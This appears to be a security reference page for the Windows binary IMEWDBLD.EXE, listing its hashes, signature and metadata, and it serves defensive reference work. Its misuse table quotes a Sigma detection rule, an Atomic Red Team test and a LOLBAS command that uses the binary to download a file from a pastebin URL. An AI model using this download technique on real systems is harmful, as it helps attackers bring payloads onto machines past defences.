IMEWDBLD.EXE

  • File Path: C:\WINDOWS\SysWOW64\IME\SHARED\IMEWDBLD.EXE
  • Description: Microsoft IME Open Extended Dictionary Module

Screenshot

IMEWDBLD.EXE

Hashes

Type Hash
MD5 F042BFE4E2BE1EF592D9CFA14F8E6BD1
SHA1 BB21C1AAAEAA9ECBE0B8561CA1B7564A359B9320
SHA256 7573D6C63A143B5E03461A581D53DE6262D8B934640E58F31179611911CD7005
SHA384 1FF426AD3B8473EC44420EF9A099E69CE53E3041462BDD557A6C5FFFDA798F379CF147BC2AC873B4608EB6F0F8173C92
SHA512 617957311C659CCBFACE1A8DA9AC8F1F75C9B44D6EA2746315D6B996FB1ED481FBD9C85A033B342E94BDCD0B313DC4160007D1B974E52AABB95034225BF17121
SSDEEP 6144:9QzjRRIIhiuyh31jz7eKOx4SvH559UlaLecVGEPnmlw03q507Gs/UEVTppkX+Cp:9QzVRIIhidJ3eKOx48H559lLemGEu80C

Signature

  • Status: Signature verified.
  • Serial: 330000023241FB59996DCC4DFF000000000232
  • Thumbprint: FF82BC38E1DA5E596DF374C53E3617F7EDA36B06
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: imewdbld.exe
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.18362.1 (WinBuild.160101.0800)
  • Product Version: 10.0.18362.1
  • Language: Language Neutral
  • Legal Copyright: Microsoft Corporation. All rights reserved.

File Similarity (ssdeep match)

File Score
C:\WINDOWS\system32\IME\SHARED\IMEWDBLD.EXE 33
C:\Windows\system32\IME\shared\IMEWDBLD.EXE 33
C:\WINDOWS\system32\IME\SHARED\IMEWDBLD.EXE 36
C:\Windows\system32\IME\SHARED\IMEWDBLD.EXE 35
C:\Windows\SysWOW64\IME\shared\IMEWDBLD.EXE 41
C:\WINDOWS\SysWOW64\IME\SHARED\IMEWDBLD.EXE 36
C:\Windows\SysWOW64\IME\SHARED\IMEWDBLD.EXE 38
C:\windows\SysWOW64\IME\SHARED\IMEWDBLD.EXE 29
C:\Windows\SysWOW64\IME\SHARED\IMEWDBLD.EXE 32

Possible Misuse

The following table contains possible examples of IMEWDBLD.EXE being misused. While IMEWDBLD.EXE is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma net_connection_win_imewdbld.yml title: Download a File with IMEWDBLD.exe DRL 1.0
sigma net_connection_win_imewdbld.yml description: Use IMEWDBLD.exe (built-in to windows) to download a file DRL 1.0
sigma net_connection_win_imewdbld.yml Image\|endswith: '\IMEWDBLD.exe' DRL 1.0
LOLBAS IMEWDBLD.yml Name: IMEWDBLD.exe  
LOLBAS IMEWDBLD.yml - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw  
LOLBAS IMEWDBLD.yml Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>  
LOLBAS IMEWDBLD.yml - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe  
atomic-red-team index.md - Atomic Test #17: Download a file with IMEWDBLD.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #17: Download a file with IMEWDBLD.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team T1105.md - Atomic Test #17 - Download a file with IMEWDBLD.exe MIT License. © 2018 Red Canary
atomic-red-team T1105.md ## Atomic Test #17 - Download a file with IMEWDBLD.exe MIT License. © 2018 Red Canary
atomic-red-team T1105.md Use IMEWDBLD.exe (built-in to windows) to download a file. This will throw an error for an invalid dictionary file. MIT License. © 2018 Red Canary
atomic-red-team T1105.md $imewdbled = $env:SystemRoot + “\System32\IME\SHARED\IMEWDBLD.exe” MIT License. © 2018 Red Canary

MIT License. Copyright (c) 2020-2021 Strontic.